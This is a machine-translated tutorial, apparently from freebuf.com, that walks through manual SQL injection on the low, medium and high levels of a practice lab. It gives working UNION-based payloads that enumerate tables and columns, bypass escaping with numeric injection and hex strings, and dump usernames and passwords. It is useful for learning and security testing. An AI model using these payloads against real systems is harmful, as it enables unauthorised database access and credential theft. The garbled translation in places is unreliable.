SQL Injection Code Audit 1 freebuf.com

SQL injection, or SQL injection, is the purpose of executing a malicious SQL statement by injecting a malicious SQL command that destroys the structure of the SQL query statement. SQL injection vulnerabilities are huge and often cause the entire database to be "off-pants", although SQL injection is still one of the most common web vulnerabilities today. The recent fire of the embassy has been a succession of black incidents, it is said that hackers rely on the common SQL injection vulnerability.

hand-injected ideas

Automatic injection artifact Sqlmap is easy to use , but still need to master some of the ideas of hand-injected, the following is a brief introduction of manual injection (non-blind) steps.

1. Determine if there is an injection, whether the injection is a character type or a digital type

2. guess the number of fields in the SQL query statement

3. determine the order of the fields displayed

4. get the current database

5. get the tables in the database

6. Get the field names in the table

7. Download the data

Primary:

Exploit exploits

In the real-world attack scenario, the attacker is unable to see the backend code, so the following manual injection steps are based on the inability to see the source.

1.determine if there is an injection, whether the injection is a character type or a digital type

input 1, query success : Enter 1 ' and ' 1 ' = ' 2, query failed, return result is empty : Enter 1 ' or ' 1234 ' = ' 1234, query succeeded : Multiple results were returned, indicating the existence of a character-type injection.

2.Guess the solutionSqlnumber of fields in the query statement

input 1′or 1=1 ORDER by 1 #, query succeeded : input 1′or 1=1 ORDER by 2 #, query succeeded : c20> Input 1′or 1=1 ORDER by 3 #, query failed :

description of the execution There are only two fields in the SQL query statement, that is, the first name,Surname.

(This can also be done by entering Union SELECT ... to guess the number of fields),

3.Determining the order of fields displayed

Enter 1′union Select #, the query succeeds, stating that the SQL statement executed is the select First Name,surname from table where id=' ID ' ...

4.Get current Database

Enter 1′union select 1,database () #, the query succeeds:

5.getting tables in a database

input 1′union select 1,GROUP_CONCAT (table_name) from Information_schema.tables where Table_schema=database () # , the query succeeds:

6.get the name of a field in a table

input 1′union select 1,group_concat (column_name) from Information_schema.columns where table_name= ' users ' # , the query succeeds:

7.Download Data

input 1′or 1=1 Union Select Group_concat (User_id,first_name,last_name), Group_concat (password) from users # , the query succeeds:

Intermediate:

 $id = mysql_real_escape_string($id); 

can see that Medium -Level code uses the mysql_real_escape_string function for special symbols

\x00,\n,\r,\, ', ', \x1a escaped, while the front-end page sets the dropdown selection form, which you want to control the user's input.

Exploit exploits

Although the front-end uses a drop-down selection menu, we can still submit a maliciously constructed query parameter by grabbing the package parameter.

1.determine if there is an injection, whether the injection is a character type or a digital type

Grab Package change parameter ID to 1′or 1=1 # Error: Grab package Change the parameter ID to 1 or 1=1 #, the query succeeds:

Indicates that there is a digital injection.

(because it is a digital injection, the server-side mysql_real_escape_string function is not the same, because digital injection does not need to use quotation marks.) )

2.Guess the solutionSqlnumber of fields in the query statement

Grab Package change parameter ID 1 ORDER by 2 #, Query succeeded: Grab Package change parameter ID to 1 order by 3 # , Error: description of the execution There are only two fields in the SQL query statement, that is, the first name,Surname.

3.Determining the order of fields displayed

Grab Package change parameter ID 1 Union Select # #, Query success: Description The SQL statement executed is Select First Name,surname from table where id=ID ...

4.Get current Database

Grab Package Change the parameter ID to 1 Union Select 1,database () #, the query succeeds:

5.getting tables in a database

Grab Package Change the parameter ID to 1 Union SELECT 1,GROUP_CONCAT (table_name) from Information_schema.tables where Table_schema=database () #, query succeeded:

6.get the name of a field in a table

Grab Package Change the parameter ID to 1 Union Select 1,group_concat (column_name) from information_schema.columns where table _name=' users ' #, query failed:

This is because the single quotation mark is escaped and becomes a \ '.

can be bypassed using the system, Grab package change parameter ID 1 Union Select 1,group_concat (column_name) from Information_schema.columns where table_name=0x7573657273 #, query succeeded:

7.Download Data

catch repair fix parameter ID 1 or 1=1 Union select Group_concat (User_id,first_name,last_name), Group_concat ( Password) from users #, query succeeded:

Senior:

  $id = stripslashes($id);
    $id = mysql_real_escape_string($id); 

with the At the Medium level , the high level only adds LIMIT 1to the SQL query statement . You want this control to output only one result.

Exploit exploits

while adding the LIMIT 1, but we can Comment it out by #. Because the process of manual injection is essentially the same as the low level, the last step is to demonstrate the download data directly.

input 1 or 1=1 Union select Group_concat (User_id,first_name,last_name), Group_concat (password) from users # , query success: what needs to be specifically mentioned is thatthe query submission page of the high level is not the same as the query results display page, and does not perform the 302 jump. The purpose of this is to prevent the general Sqlmap injection, because sqlmap in the injection process, can not get the results of the query submission page, no feedback, There is no way to inject it further.

SQL Injection Code Audit 1 (EXT) freebuf.com